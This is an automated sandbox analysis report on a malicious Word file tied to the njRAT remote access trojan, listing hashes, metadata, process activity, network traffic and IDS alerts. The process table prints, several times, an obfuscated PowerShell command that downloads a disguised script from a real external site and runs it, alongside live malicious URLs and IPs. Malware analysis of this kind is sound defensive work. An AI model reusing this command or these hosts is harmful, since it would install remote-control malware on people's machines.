File name: | 11d39a7907f4559a3b2b8cae165637cd879ed23a9e019a59ce4c183e32463557.doc |
Full analysis: | https://app.any.run/tasks/bdfc6c55-1ee7-4ed9-a7e7-512b857a9ebf |
Verdict: | Malicious activity |
Threats: | njRAT is a remote access trojan. It is one of the most widely accessible RATs on the market, and an abundance of educational material exists for it; interested attackers can even find tutorials on YouTube. This has made it one of the most popular RATs in the world. |
Analysis date: | September 11, 2019, 01:48:17 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.openxmlformats-officedocument.wordprocessingml.document |
File info: | Microsoft Word 2007+ |
MD5: | 887A41D358F46C03F6AA84F3FC6B7A2D |
SHA1: | F7A9F9E11178B34E5C8FFEF09615A9D96699D3C2 |
SHA256: | 11D39A7907F4559A3B2B8CAE165637CD879ED23A9E019A59CE4C183E32463557 |
SSDEEP: | 768:kw8YHz64ustaPvM7eB7G+aY/ML88wHd0nusQKIR:kwZHz6OoE7eB7G+pMBwHd7Ko |
.docx | | | Word Microsoft Office Open XML Format document (52.2) |
---|---|---|
.zip | | | Open Packaging Conventions container (38.8) |
.zip | | | ZIP compressed archive (8.8) |
AppVersion: | 14 |
---|---|
HyperlinksChanged: | No |
SharedDoc: | No |
CharactersWithSpaces: | 65 |
LinksUpToDate: | No |
Company: | Microsoft |
ScaleCrop: | No |
Paragraphs: | 1 |
Lines: | 1 |
DocSecurity: | None |
Application: | Microsoft Office Word |
Characters: | 56 |
Words: | 10 |
Pages: | 1 |
TotalEditTime: | 1 minute |
Template: | Normal.dotm |
ModifyDate: | 2019:09:09 18:44:00Z |
CreateDate: | 2019:09:09 18:43:00Z |
RevisionNumber: | 3 |
LastModifiedBy: | Microsoft |
Keywords: | - |
Description: | - |
Creator: | Microsoft |
Subject: | - |
Title: | - |
ZipFileName: | [Content_Types].xml |
ZipUncompressedSize: | 1526 |
ZipCompressedSize: | 407 |
ZipCRC: | 0x8b9521a1 |
ZipModifyDate: | 1980:01:01 00:00:00 |
ZipCompression: | Deflated |
ZipBitFlag: | 0x0006 |
ZipRequiredVersion: | 20 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2864 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\11d39a7907f4559a3b2b8cae165637cd879ed23a9e019a59ce4c183e32463557.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3964 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
3344 | "C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Outlook Exit code: 0 Version: 14.0.6025.1000 | ||||
2552 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $r='KEX'.replace('K','I'); sal D $r;'(&(GCM'+' *W-O*)'+ 'Net.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Fil'+'e(''https://refugiovistaserrana.com.br/novosite2/cogumelo.jpg'',$env:APPDATA+''\''+''cogumeloxd.vbs'')'|D; start-process($env:APPDATA+'\'+'cogumeloxd.vbs') | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | OUTLOOK.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2424 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
3388 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $r='KEX'.replace('K','I'); sal D $r;'(&(GCM'+' *W-O*)'+ 'Net.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Fil'+'e(''https://refugiovistaserrana.com.br/novosite2/cogumelo.jpg'',$env:APPDATA+''\''+''cogumeloxd.vbs'')'|D; start-process($env:APPDATA+'\'+'cogumeloxd.vbs') | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | OUTLOOK.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3996 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
3932 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $r='KEX'.replace('K','I'); sal D $r;'(&(GCM'+' *W-O*)'+ 'Net.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Fil'+'e(''https://refugiovistaserrana.com.br/novosite2/cogumelo.jpg'',$env:APPDATA+''\''+''cogumeloxd.vbs'')'|D; start-process($env:APPDATA+'\'+'cogumeloxd.vbs') | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | OUTLOOK.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2760 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
3172 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Roaming\cogumeloxd.vbs" | C:\Windows\System32\WScript.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 1 Version: 5.8.7600.16385 | ||||
PID | Process | Filename | Type | |
---|---|---|---|---|
2864 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR8D02.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2864 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\{419E9A89-3920-43DB-BE17-B5367C7D3B7E} | — | |
MD5:— | SHA256:— | |||
2864 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\{4D67DE93-402A-48CF-BEC7-D700ECEA156B} | — | |
MD5:— | SHA256:— | |||
2864 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3A3112D8.doc | — | |
MD5:— | SHA256:— | |||
2864 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\948476A6.doc | — | |
MD5:— | SHA256:— | |||
3964 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRD94D.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3344 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\CVRDEEB.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2424 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRE6BB.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2552 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\M81Q2IXYNARRWHWDXU7X.temp | — | |
MD5:— | SHA256:— | |||
3996 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVREA84.tmp.cvr | — | |
MD5:— | SHA256:— | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2864 | WINWORD.EXE | HEAD | 200 | 172.105.68.75:80 | http://172.105.68.75/macro.doc | US | — | — | malicious |
2864 | WINWORD.EXE | HEAD | 301 | 67.199.248.10:80 | http://bit.ly/2kqOzpz | US | — | — | shared |
2864 | WINWORD.EXE | GET | 304 | 172.105.68.75:80 | http://172.105.68.75/macro.doc | US | — | — | malicious |
2864 | WINWORD.EXE | HEAD | 200 | 172.105.68.75:80 | http://172.105.68.75/macro.doc | US | — | — | malicious |
2864 | WINWORD.EXE | HEAD | 301 | 67.199.248.10:80 | http://bit.ly/2kqOzpz | US | — | — | shared |
2864 | WINWORD.EXE | HEAD | 200 | 172.105.68.75:80 | http://172.105.68.75/macro.doc | US | — | — | malicious |
2864 | WINWORD.EXE | GET | 200 | 172.105.68.75:80 | http://172.105.68.75/macro.doc | US | text | 561 Kb | malicious |
2864 | WINWORD.EXE | GET | 301 | 67.199.248.10:80 | http://bit.ly/2kqOzpz | US | html | 117 b | shared |
2864 | WINWORD.EXE | HEAD | 200 | 172.105.68.75:80 | http://172.105.68.75/macro.doc | US | text | 561 Kb | malicious |
2864 | WINWORD.EXE | HEAD | 301 | 67.199.248.10:80 | http://bit.ly/2kqOzpz | US | — | — | shared |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
984 | svchost.exe | 67.199.248.15:443 | bitly.com | Bitly Inc | US | shared |
984 | svchost.exe | 67.199.248.10:80 | bit.ly | Bitly Inc | US | shared |
2864 | WINWORD.EXE | 67.199.248.10:80 | bit.ly | Bitly Inc | US | shared |
2552 | powershell.exe | 186.202.153.226:443 | refugiovistaserrana.com.br | Locaweb Serviços de Internet S/A | BR | unknown |
2864 | WINWORD.EXE | 172.105.68.75:80 | — | — | US | malicious |
3932 | powershell.exe | 186.202.153.226:443 | refugiovistaserrana.com.br | Locaweb Serviços de Internet S/A | BR | unknown |
3552 | powershell.exe | 186.202.153.226:443 | refugiovistaserrana.com.br | Locaweb Serviços de Internet S/A | BR | unknown |
2984 | Powershell.exe | 186.202.153.226:443 | refugiovistaserrana.com.br | Locaweb Serviços de Internet S/A | BR | unknown |
2940 | Powershell.exe | 186.202.153.226:443 | refugiovistaserrana.com.br | Locaweb Serviços de Internet S/A | BR | unknown |
2936 | Powershell.exe | 186.202.153.226:443 | refugiovistaserrana.com.br | Locaweb Serviços de Internet S/A | BR | unknown |
Domain | IP | Reputation |
---|---|---|
bit.ly | | shared |
bitly.com | | shared |
refugiovistaserrana.com.br | | unknown |
google.com | | whitelisted |
duckoption.duckdns.org | | malicious |
PID | Process | Class | Message |
---|---|---|---|
2864 | WINWORD.EXE | Potentially Bad Traffic | ET INFO Dotted Quad Host DOC Request |
2864 | WINWORD.EXE | Potentially Bad Traffic | ET INFO Dotted Quad Host DOC Request |
2864 | WINWORD.EXE | A Network Trojan was detected | MALWARE [PTsecurity] RTF CVE-2017-11882 Exploit |
2864 | WINWORD.EXE | A Network Trojan was detected | MALWARE [PTsecurity] RTF CVE-2017-11882 Exploit |
2864 | WINWORD.EXE | A Network Trojan was detected | MALWARE [PTsecurity] RTF CVE-2017-11882 Exploit |
2864 | WINWORD.EXE | Potentially Bad Traffic | ET INFO Dotted Quad Host DOC Request |
2864 | WINWORD.EXE | Potentially Bad Traffic | ET INFO Dotted Quad Host DOC Request |
2864 | WINWORD.EXE | Potentially Bad Traffic | ET INFO Dotted Quad Host DOC Request |
2864 | WINWORD.EXE | Potentially Bad Traffic | ET INFO Dotted Quad Host DOC Request |
2864 | WINWORD.EXE | Misc activity | SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7) |